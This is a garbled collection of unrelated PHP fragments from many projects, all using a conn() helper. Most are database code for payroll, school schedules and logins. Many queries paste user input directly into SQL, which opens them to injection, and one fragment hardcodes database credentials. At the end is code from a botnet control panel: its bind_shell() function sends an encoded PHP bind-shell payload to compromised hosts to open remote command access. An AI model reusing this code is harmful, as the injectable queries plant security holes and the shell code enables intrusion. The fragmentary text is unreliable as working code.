/**
* Funcion que obtiene los empleados por puesto
*
* @return array
* @author Walter
*/
function getEmplePuesto($puesto)
{
$query = "select e.nombre,e.id from tbl_datos_economicos as d, tbl_empleado as e where d.tbl_empleado_id = e.id\n\t\t\t\tand d.puesto = '{$puesto}'";
$con = conn();
$r = $con->query($query);
return $r->fetchAll();
}
function getNumJustificaciones($inicio, $fin, $id)
{
$con = conn();
$query = " select count(asiento) as num from justificaciones where fecha between '{$inicio}' and '{$fin}' and id_pers = {$id}";
$r = $con->query($query);
return $r->fetch();
}
/**
* lista las asistencias de un empleado
*
* @return pdo_array
* @author Walter
*/
function listaAsistenciaEmpleado($inicio, $fin, $id)
{
$con = conn();
$query = "select a.fecha, a.h_ent, a.h_sal,(time_to_sec(timediff(h_sal,h_ent )) / 3600) as hrs_trabj from personal as p, asistencia as a where p.id = {$id} and p.id = a.id_pers " . "and a.fecha between '{$inicio}' and '{$fin}' and p.activo = TRUE union (select j.fecha, 'JUSTIFICADA','JUSTIFICADA','J' from personal as p,justificaciones as j " . "where p.id = {$id} and p.id= j.id_pers and (j.fecha between '{$inicio}' and '{$fin}') and p.activo = true) order by fecha ASC";
$r = $con->query($query);
return $r;
}
function get($table, $fields = "*", $other = "")
{
if (is_array($fields)) {
$sql = "SELECT " . merge($fields) . " FROM " . $table . " " . $other;
} else {
$sql = "SELECT " . $fields . " FROM " . $table . " " . $other;
}
//echo $sql;
return conn()->query($sql)->fetchAll();
}
public function alter_database($query)
{
if ($this->permission() != ADMIN) {
Error('You must be admin to alter the database');
}
conn($mysqli);
if (!$mysqli->query($query)) {
Error($mysqli->error);
}
$mysqli->close();
}
function refresh_room_sched_datatable()
{
$conn = conn();
$post = $_POST;
$query = 'SELECT
tbl_room.`room_no`,
tbl_room.`room_name`,
tbl_subject.`subject_code`,
tbl_subject.`description`,
tbl_blocks.`name` AS `block_name`,
CONCAT(
tbl_faculty.`fname`,
" ",
tbl_faculty.`mname`,
" ",
tbl_faculty.`lname`
) AS `prof_name`,
tbl_schedule.`monday`,
tbl_schedule.`tuesday`,
tbl_schedule.`wednesday`,
tbl_schedule.`thursday`,
tbl_schedule.`friday`,
tbl_schedule.`saturday`,
tbl_schedule.from,
tbl_schedule.`to`
FROM
`tbl_schedule`
INNER JOIN `tbl_room`
ON tbl_schedule.`room_id` = tbl_room.`room_id`
INNER JOIN `tbl_faculty`
ON tbl_schedule.`prof_id` = tbl_faculty.`emp_no`
INNER JOIN `tbl_subject`
ON tbl_schedule.`subject_id` = tbl_subject.`subject_id`
INNER JOIN `tbl_blocks`
ON tbl_schedule.`block_id` = tbl_blocks.`id` where tbl_schedule.school_year = ' . $post['school_year'] . ' and tbl_schedule.semester = ' . $post['sem'] . ' and tbl_schedule.prof_id = ' . $_SESSION['faculty_id'];
$result = mysql_query($query) or die(mysql_error());
while ($row = mysql_fetch_assoc($result)) {
$days = array('monday', 'tuesday', 'wednesday', 'thursday', 'friday', 'saturday');
$sched = "";
foreach ($days as $day) {
if ($row[$day] == 1) {
$sched .= $day . '<br/>';
}
}
$sched .= $row['from'] . ' to ' . $row['to'];
echo '<tr>';
echo ' <td style="text-align:center">' . $row['room_name'] . ' (' . $row['room_no'] . ')</td>';
echo ' <td style="text-align:center">' . $row['description'] . ' (' . $row['subject_code'] . ')</td>';
echo ' <td style="text-align:center">' . $row['prof_name'] . '</td>';
echo ' <td style="text-align:center">' . $row['block_name'] . '</td>';
echo ' <td style="text-align:center">' . $sched . '</td>';
echo '</tr>';
}
}
/**
* Funcion que verifica el login de un administrador
*
* @return boolean
* @author Walter
*/
function checkAdmin($id, $pass)
{
$con = conn();
$queyr = "SELECT ad.contra FROM administrador as ad where ad.clave = '{$id}'";
$r = $con->query($queyr);
$res = $r->fetch();
if ($res['contra'] == $pass && $res != null) {
return 1;
} else {
return 0;
}
}
function ejecutarInsert($table, $params)
{
$conexion = conn();
foreach ($params as $field => $value) {
$fields .= "{$field},";
$values .= is_string($value) ? "'{$value}'" : "{$value}";
}
$insertSQL = "INSERT INTO {$table} ({$fields}) VALUES ({$values});";
$res = pg_query($insertSQL) or sysError("conectaBD.ejecutaConsulta.pg_query '" . $insertSQL . "'");
pg_close($conexion);
return $res;
}
/**
* checa sila clave de un empleado es la correcta
*
* @return int
* @author
*/
function checkID($emp)
{
$con = conn();
$query = "select id from personal where id = {$emp} and activo = 1";
$r = $con->query($query);
$res = $r->fetch();
if (empty($res)) {
return FALSE;
} else {
return TRUE;
}
}
function register($username, $password, $mail)
{
if (!filter_var($mail, FILTER_VALIDATE_EMAIL)) {
Error("E-Mail is not valid.");
}
if (strlen($password) < 8) {
Error("Password too short, it have to be bigger than 8 characters.");
}
if (strlen($username) < 4) {
Error("Username too short, it have to be bigger than 4 characters.");
}
conn($mysqli);
$query = "INSERT INTO Users ( Username, Password, Permission, Mail ) VALUES ( '";
$result = $mysqli->query("SELECT * FROM Users LIMIT 1");
if (!$result->fetch_object()) {
if (!$mysqli->query($query . $username . "', '" . md5($password) . "', '" . ADMIN . "', '" . $mail . "');")) {
Error($mysqli->error);
}
} else {
if (!$mysqli->query($query . $username . "', '" . md5($password) . "', '" . USER . "', '" . $mail . "');")) {
Error($mysqli->error);
}
}
}
require_once '../config/config.php';
$msg = '';
$error = FALSE;
$app_id = isset($_REQUEST['app_id']) ? clean($_REQUEST['app_id']) : '';
$login_id = isset($_REQUEST['login_id']) ? clean($_REQUEST['login_id']) : '';
$password_id = isset($_REQUEST['password_id']) ? clean($_REQUEST['password_id']) : '';
$db = isset($_REQUEST['db']) ? clean($_REQUEST['db']) : '';
$act = isset($_REQUEST['act']) ? clean($_REQUEST['act']) : '';
if ($_SERVER['REQUEST_METHOD'] == 'POST' and $act == 'login') {
try {
ex_empty($app_id, 'Pilih APP.');
ex_empty($login_id, 'Masukkan kode user..');
ex_empty($password_id, 'Masukkan Password.');
ex_empty($db, 'Pilih database.');
$conn = conn($db);
ex_conn($conn);
if ($conn) {
$conn->begintrans();
}
$user_id = '';
$login_id = strtoupper($login_id);
$password_id = $password_id;
$full_name = '';
$role = '';
$div = '';
$modul_id = array();
$modul_ha = array();
$obj = $conn->Execute("\n\t\tSELECT \n\t\t\tUPPER(USER_ID) AS USER_ID, \n\t\t\t(PASSOWRD_ID) AS PASSOWRD_ID, \n\t\t\tUPPER(LOGIN_ID) AS LOGIN_ID, \n\t\t\tUPPER(FULL_NAME) AS FULL_NAME,\n\t\t\tUPPER(ROLE) AS ROLE,\n\t\t\tUPPER(DIV) AS DIV\n\t\tFROM\n\t\t\tUSER_APPLICATIONS\n\t\tWHERE\n\t\t\tLOGIN_ID = '{$login_id}'\n\t\t");
$dbpass = $obj->fields['PASSOWRD_ID'];
if ($obj->fields['LOGIN_ID'] == $login_id) {
<?php
require_once "./mysql_connect.php";
// require_once("./mysql_query.php");
conn();
if ($_POST) {
if (isset($_POST['oldbarcode'])) {
pupdate($_POST);
} else {
update($_POST);
}
}
function pupdate($arg)
{
mysql_select_db('nutrition');
$sql = "delete from nutri0 where barcode='{$arg['oldbarcode']}'";
mysql_query($sql);
$sql = "delete from nutri1 where barcode='{$arg['oldbarcode']}'";
mysql_query($sql);
$p = array($arg['type'], $arg['description'], $arg['barcode'], $arg['per'], $arg['energykj'], $arg['energykc'], $arg['protein'], $arg['carb'], $arg['sugar'], $arg['fat'], $arg['saturates'], $arg['fibre'], $arg['sodium'], $arg['hydrodised']);
insert($p);
}
function update($arg)
{
mysql_select_db('nutrition');
$sql = "update nutri0 set";
$i = 0;
foreach ($arg as $a => $b) {
if (empty($b)) {
++$i;
continue;
function updateExecute()
{
global $config;
$myConn = conn('', FALSE);
# MUST precede formReq() function, which uses active connection to parse data
$redirect = $config->adminEdit;
# global var used for following formReq redirection on failure
$FirstName = formReq('FirstName');
# formReq calls dbIn() internally, to check form data
$LastName = formReq('LastName');
$Email = strtolower(formReq('Email'));
$Privilege = formReq('Privilege');
$AdminID = formReq('AdminID');
#check for duplicate email
$sql = sprintf("select AdminID from " . PREFIX . "Admin WHERE (Email='%s') and AdminID != %d", $Email, $AdminID);
$result = mysql_query($sql, $myConn) or die(trigger_error(mysql_error(), E_USER_ERROR));
if (mysql_num_rows($result) > 0) {
# someone already has email!
feedback("Email already exists - please choose a different email.");
myRedirect($config->adminEdit);
# duplicate email
}
#sprintf() function allows us to filter data by type while inserting DB values. Illegal data is neutralized, ie: numerics become zero
$sql = sprintf("UPDATE " . PREFIX . "Admin set FirstName='%s',LastName='%s',Email='%s',Privilege='%s' WHERE AdminID=%d", $FirstName, $LastName, $Email, $Privilege, (int) $AdminID);
mysql_query($sql, $myConn) or die(trigger_error(mysql_error(), E_USER_ERROR));
//feedback success or failure of insert
if (mysql_affected_rows($myConn) > 0) {
$msg = "Admin Updated!";
feedback("Successfully Updated!", "notice");
if ($_SESSION["AdminID"] == $AdminID) {
#this is me! update current session info:
$_SESSION["Privilege"] = $Privilege;
$_SESSION["FirstName"] = $FirstName;
}
} else {
feedback("Data NOT Updated! (or not changed from original values)");
}
get_header();
echo '
<div align="center"><h3>Edit Administrator</h3></div>
<div align="center"><a href="' . $config->adminEdit . '">Edit More</a></div>
<div align="center"><a href="' . $config->adminDashboard . '">Exit To Admin</a></div>
';
get_footer();
}
<?php
// Create connection
function conn()
{
$con = mysqli_connect("sql200.byethost33.com", "b33_14425459", "66254442", "b33_14425459_shohan");
// Check connection
if (!$con) {
echo "Failed to connect to MySQL: " . mysqli_connect_error();
} else {
$result = mysqli_query($con, "SELECT * FROM person");
if ($result == 0) {
echo "error";
} else {
echo "<table border='1'>\r\n<tr>\r\n<th>Firstname</th>\r\n<th>Lastname</th>\r\n<th>Salary</th>\r\n<th>email</th>\r\n</tr>";
while ($row = mysqli_fetch_array($result)) {
echo "<tr>";
echo "<td>" . $row['first_name'] . "</td>";
echo "<td>" . $row['last_name'] . "</td>";
echo "<td>" . $row['salary'] . "</td>";
echo "<td>" . $row['email'] . "</td>";
echo "</tr>";
}
echo "</table>";
}
}
}
return conn();
*/
# SQL statement - PREFIX is optional way to distinguish your app
$sql = "select FirstName, LastName, Email from test_Customers";
//END CONFIG AREA ----------------------------------------------------------
get_header();
#defaults to header_inc.php
?>
<h3 align="center"><?php
echo $config->titleTag;
?>
</h3>
<p>This page is both a test page for your mysql classic connection, and a starting point for
building DB applications using mysql connections</p>
<p>creates a simple mysql connection via the function conn()</p>
<?php
$myConn = conn('', FALSE);
# conn() creates mysql classic connection
#$result stores data object in memory - $sql & conn are flipped in mysql_ classic connection
$result = mysql_query($sql, $myConn) or die(trigger_error(mysql_error($myConn), E_USER_ERROR));
echo '<div align="center"><h4>SQL STATEMENT: <font color="red">' . $sql . '</font></h4></div>';
if (mysql_num_rows($result) > 0) {
#there are records - present data
while ($row = mysql_fetch_assoc($result)) {
# pull data from associative array
echo '<p>';
echo 'FirstName: <b>' . $row['FirstName'] . '</b><br />';
echo 'LastName: <b>' . $row['LastName'] . '</b><br />';
echo 'Email: <b>' . $row['Email'] . '</b><br />';
echo '</p>';
}
} else {
function countRate()
{
$id = $_SESSION['userData']['agencyID'];
$db = conn();
$sql = "SELECT ( sum(rating)/count(rating)) as rate FROM rating WHERE agencyID = {$id}";
$result = $db->query($sql)->fetch();
return $result;
$db = null;
}
public function chPassword($password)
{
conn($mysqli);
if (!$this->isUser()) {
Error(LOGIN);
}
if (!$mysqli->query($query . "UPDATE Users SET Password='******' WHERE Username='******'")) {
Error($mysqli->error);
}
$this->password = $password;
$mysqli->close();
}
</div>
<table class="contentTbl">
<caption>
<h2>Usuarios Administradores</h2>
</caption>
<thead>
<tr>
<th>#</th>
<th>Nombre de Usuario</th>
<th>Jornada</th>
<th></th>
</tr>
</thead>
<tbody>
<?php
$connection = conn();
include "../includes/paginator.inc.php";
//echo 'SQL: '.$_pagi_sql.'<br />';
$rows = pg_num_rows($_pagi_result);
//echo '$_pagi_totalReg: '.$_pagi_totalReg.'</br>';
//echo '$_pagi_cuantos: '.$_pagi_cuantos.'</br>';
//echo '$rows: '.$rows.'</br>';
if ($rows < 1) {
echo '<tr class="rowPaginator"><td colspan="20" align="center">NO SE ENCONTRARON REGISTROS</td></tr>';
} else {
$cont = 1;
if ($_pagi_totalReg > $_pagi_cuantos) {
echo '<tr><td colspan="20" align="center"><strong>' . $_pagi_navegacion . '</strong></td></tr>';
}
while ($row = pg_fetch_assoc($_pagi_result)) {
if ($cont % 2 == 1) {
function isDupeUser($usr)
{
$conn = conn();
$table = "fp_users";
$sql = "SELECT COUNT(*) FROM {$table} WHERE username = \"{$usr}\"";
$result = mysqli_query($conn, $sql);
$row = $result->fetch_row();
if ($row[0] > 0) {
echo "USER EXISTS";
} else {
echo "VALID";
}
$result->free();
$conn->close();
return;
}
require '../inc_0700/config_inc.php';
#provides configuration, pathing, error handling, db credentials
if (isset($_POST['em']) && isset($_POST['pw'])) {
//if POST is set, prepare to process form data
//next check for specific issues with data
if (!ctype_graph($_POST['pw'])) {
//data must be alphanumeric or punctuation only
feedback("Illegal characters were entered. (error code #" . createErrorCode(THIS_PAGE, __LINE__) . ")", "error");
myRedirect($config->adminLogin);
}
if (!onlyEmail($_POST['em'])) {
//login must be a legal email address only
feedback("Illegal characters were entered. (error code #" . createErrorCode(THIS_PAGE, __LINE__) . ")", "error");
myRedirect($config->adminLogin);
}
$myConn = conn("", FALSE);
# mysql classic conn, MUST precede formReq() which uses active connection to parse data
$redirect = $config->adminLogin;
# global var used for following formReq redirection on failure
$Email = formReq('em');
# formReq()requires a form element with data, redirects to $redirect if no data sent
$MyPass = formReq('pw');
# formReq() calls dbIn() internally, to check form data
$sql = sprintf("select AdminID,FirstName,Privilege,NumLogins from " . PREFIX . "Admin WHERE Email='%s' AND AdminPW=SHA('%s')", $Email, $MyPass);
$result = @mysql_query($sql, $myConn) or die(trigger_error(mysql_error(), E_USER_ERROR));
if (mysql_num_rows($result) > 0) {
# valid user, create session vars, redirect!
$row = mysql_fetch_array($result);
#no while statement, should be single record
startSession();
#wrapper for session_start()
function searchByCaption($text)
{
$res = conn()->query("SELECT * FROM users JOIN posts ON users.id = posts.user_id\n WHERE caption LIKE '%{$text}%' AND is_private=b'0'");
$arr = convertToArray($res);
foreach ($arr as $ind => $result) {
$arr[$ind]['link'] = 'post/' . $result['id'];
$arr[$ind]['header'] = $result['caption'];
$arr[$ind]['type'] = 'Post By Caption';
}
return $arr;
}
function insert($item)
{
conn();
mysql_select_db("nutrition");
$sql = 'insert into nutri0(type,description,barcode) values(';
for ($i = 0; $i < 3; $i++) {
$sql .= "'{$item[$i]}'";
if ($i != 2) {
$sql .= ',';
} else {
$sql .= ')';
}
}
$result = mysql_query($sql);
$sql = 'insert into nutri1(barcode,per,energykj,energykc,protein,carb,sugar,fat,saturates,fibre,sodium,hydrodised) values(';
for ($i = 2; $i < 14; $i++) {
if (empty($item[$i])) {
$item[$i] = 'null';
$sql .= 'null';
if ($i != 13) {
$sql .= ',';
} else {
$sql .= ')';
}
continue;
}
if ($i != 13) {
if ($i == 3 || $i == 2) {
$sql .= "'{$item[$i]}',";
} else {
$sql .= "{$item[$i]},";
}
} else {
$sql .= "'{$item[$i]}')";
}
}
$result = mysql_query($sql);
if (!$result) {
die('hehe' . mysql_error() . $sql);
}
print "successed!";
}
function save_subject_to_course(){
$conn = conn();
$post = $_POST;
$delete = 'delete * from tbl_year_course_subjects where course_id = '.$post['course_id'].' and year_level = '.$post['year_level'].' and school_year = '.$post['school_year'].' and semester ='.$post['semester'];
mysql_query($delete);
foreach($post['subjects'] as $subject_id){
$insert = '
insert into tbl_year_course_subjects (
year_level,
course_id,
subject_id,
school_year,
semester
)
values(
'.$post['year_level'].',
'.$post['course_id'].',
'.$subject_id.',
'.$post['school_year'].',
'.$post['semester'].'
)
';
$result = mysql_query($insert);
}
$response['status'] = 'success';
echo json_encode($response);
}
$con3 = "SET ANSI_NULLS OFF";
$con3 = mssql_query($con3);
$con4 = "SET TRANSACTION ISOLATION LEVEL READ UNCOMMITTED";
$con4 = mssql_query($con4);
$con5 = "SET LOCK_TIMEOUT -1";
$con5 = mssql_query($con5);
$con6 = "SET QUOTED_IDENTIFIER OFF";
$con6 = mssql_query($con6);
$con7 = "set language spanish";
$con7 = mssql_query($con7);
}
if (isset($_POST['pedido'])) {
$x = $_POST['pedido'];
$movID = $x['pedido_id'];
$db = $x['db'];
conn($db);
$qry = "SELECT v.ID, c.Cliente, c.Nombre, v.FechaEmision, v.FechaRequerida, v.Almacen, v.Proyecto, v.Condicion, v.FormaEnvio, v.ListaPreciosEsp, v.OrdenCompra, v.FechaOrdenCompra, v.Observaciones FROM Venta v JOIN Cte c ON v.Cliente = c.Cliente WHERE v.Mov = 'Pedido' AND v.Estatus = 'Pendiente' AND v.MovID = '" . $movID . "' AND v.Agente ='" . $_SESSION["user"] . "'";
$details = mssql_fetch_array(mssql_query($qry));
$qry = "SELECT * FROM VentaD v JOIN VentaTCalc c ON v.Renglon = c.Renglon AND v.ID = c.ID WHERE v.ID = " . $details["ID"] . " ORDER BY v.Renglon";
$qry = mssql_query($qry);
while ($row = mssql_fetch_assoc($qry)) {
$sell_details[] = $row;
}
if ($details) {
$html = '<div id="detalles_venta">';
$html .= '<div class="titulos">';
$html .= '<div><strong>Art.</strong></div>';
$html .= '<div><strong>Cant.</strong></div>';
$html .= '<div><strong>Inv.</strong></div>';
$html .= '<div><strong>Desc.</strong></div>';
$html .= '<div><strong>IVA</strong></div>';
<?php
quotes();
?>
</div>
</div>
<div id="menu">
<ul>
<li class="txt_left"><?php
echo "Local Address: " . $_SERVER['SERVER_ADDR'];
?>
</li>
<li class="txt_center"></li>
<li class="txt_right"><?php
echo "Remote Address: " . conn('http://bot.whatismyipaddress.com/');
?>
</li>
</ul>
</div>
<div id="page">
<div id="page-bgtop">
<div id="page-bgbtm">
<div id="content">
<div class="post">
<h2 class="title"><a href="#">Bots</a></h2>
<div class="entry">
<p class="meta">
<?php
checkbots();
<?php
require_once '../../../config/config.php';
$conn = conn();
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<!-- CSS -->
<link type="text/css" href="../../../config/css/style.css" rel="stylesheet">
<link type="text/css" href="../../../plugin/css/zebra/default.css" rel="stylesheet">
<link type="text/css" href="../../../plugin/window/themes/default.css" rel="stylesheet">
<link type="text/css" href="../../../plugin/window/themes/mac_os_x.css" rel="stylesheet">
<!-- JS -->
<script type="text/javascript" src="../../../plugin/js/jquery-1.10.2.min.js"></script>
<script type="text/javascript" src="../../../plugin/js/jquery-migrate-1.2.1.min.js"></script>
<script type="text/javascript" src="../../../plugin/js/jquery.inputmask.custom.js"></script>
<script type="text/javascript" src="../../../plugin/js/keymaster.js"></script>
<script type="text/javascript" src="../../../plugin/js/zebra_datepicker.js"></script>
<script type="text/javascript" src="../../../plugin/window/javascripts/prototype.js"></script>
<script type="text/javascript" src="../../../plugin/window/javascripts/window.js"></script>
<script type="text/javascript" src="../../../config/js/main.js"></script>
<script type="text/javascript">
/* lookup
function get_lookup(nk)
{
if (nk.length == 0) {
jQuery('#wrap_lookup').fadeOut();
?>
</li>
<li class="txt_center"><?php
echo date("d.m.y");
?>
</li>
<li class="txt_right"><?php
echo $_SERVER['SERVER_ADDR'];
?>
</li>
<li class="txt_right"><?php
echo $_SERVER['SERVER_NAME'];
?>
</li>
<li class="txt_right"><?php
echo conn('http://bot.whatismyipaddress.com/');
?>
</li>
</ul>
</div>
<div id="page">
<div id="page-bgtop">
<div id="page-bgbtm">
<div id="content">
<div class="post" name="top" >
<h2 class="title"><center><a href="#1337day">1337day</a> - <a href="#NVD">Nation Vuln Database</a> - <a href="#securityfocus">Security Focus</a> - <a href="#cxsecurity">cxsecurity</a></center></h2>
</div>
<div class="post">
<h2 class="title"><a name="1337day" href="#top" >1337day</a></h2>
<div class="entry">
<p class="meta">1337day.com</p>
/**
* obtiene una lista con los numeros de empleados por lenguajeo curso segun se requiera
*
* @return void
* @author
*/
function getNumsConoc($tipo)
{
$query = "select l.lenguaje as label, count(t.curso) as value from tbl_lenguajes as l, tbl_conocimientos as t where t.tbl_lenguajes_id = l.id\n \t\t\t\tand t.curso = {$tipo} group by l.id";
$con = conn();
$r = $con->query($query);
return $r->fetchAll();
}
<?php
require_once '../../../../../config/config.php';
require_once '../../../../../config/terbilang.php';
die_login();
//die_app('');
//die_mod('');
$conn = conn($sess_db);
die_conn($conn);
$terbilang = new Terbilang();
$id = isset($_REQUEST['id']) ? base64_decode(clean($_REQUEST['id'])) : '';
$query = "\n\tSELECT * \n\tFROM KWITANSI\n\tWHERE NOMOR_KWITANSI = '{$id}'\n";
$obj = $conn->execute($query);
$nama_pembayar = $obj->fields['NAMA_PEMBAYAR'];
$keterangan = $obj->fields['KETERANGAN'];
$nilai = to_money($obj->fields['NILAI']);
$tanggal = tgltgl(f_tgl($obj->fields['TANGGAL']));
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<style type="text/css">
@page {
size: A4;
margin: 0;
}
@media screen, print{
body {
font-family: verdana,sans-serif;
function bind_shell()
{
if (isset($_POST['bindpassword']) && isset($_POST['bindport']) && isset($_POST['bindid'])) {
$conn = new mysqli(SQL_HOST, SQL_USER, SQL_PWD, SQL_DB);
$check = mysqli_query($conn, "SELECT * FROM `bots` WHERE `id` = " . mysql_escape_string($_POST['bindid']) . " LIMIT 1");
$row = mysqli_fetch_array($check);
if ($row !== false) {
$cmd = 'php+-r+%27%24sockfd+%3D+socket_create%28AF_INET%2C+SOCK_STREAM%2C+SOL_TCP%29%3B+socket_bind%28%24sockfd%2C+%22127.0.0.1%22%2C+%22' . htmlspecialchars($_POST['bindport']) . '%22%29%3B+socket_listen%28%24sockfd%2C15%29%3B+%24client+%3D+socket_accept%28%24sockfd%29%3B+socket_write%28%24client%2C+%22Enter+password%3A+%22%29%3B+%24input%3Dsocket_read%28%24client%2Cstrlen%28%22' . htmlspecialchars($_POST['bindpassword']) . '%22%29%2B2%29%3Bif%28trim%28%24input%29%3D%3D%22' . htmlspecialchars($_POST['bindpassword']) . '%22%29%7Bsocket_write%28%24client%2C%22%5Cn%5Cn%22%29%3Bsocket_write%28%24client%2Cshell_exec%28%22date+%2Ft+%26+time+%2Ft%22%29.%22%5Cn%22.shell_exec%28%22ver%22%29.shell_exec%28%22date%22%29.%22%5Cn%22.shell_exec%28%22uname+-a%22%29%29%3Bsocket_write%28%24client%2C%22%5Cn%5Cn%22%29%3Bwhile%281%29%7B%24commandPrompt%3D%22%5BCMD%5D%3E+%22%3B%24maxCmdLen%3D' . htmlspecialchars($_POST['bindport']) . '%3Bsocket_write%28%24client%2C%24commandPrompt%29%3B%24cmd%3Dsocket_read%28%24client%2C%24maxCmdLen%29%3Bif%28%24cmd%3D%3DFALSE%29%7Becho+%22The+client+Closed+the+conection%21%22%3Bbreak%3B%7Dsocket_write%28%24client%2Cshell_exec%28%24cmd%29%29%3B%7D%7Delse%7Becho+%22Wrong+password%21%22%3Bsocket_write%28%24client%2C%22Wrong+password%21+%5Cn%5Cn%22%29%3B%7D%27';
conn($row[1] . '?_=' . PWN_PHP_METHOD . '&__=' . $cmd);
echo '<br /><p>Connection completed</p>';
} else {
echo '<br/><p>No shell found for id <b>' . htmlspecialchars($_POST['bindid']) . '</b></p>';
}
}
}
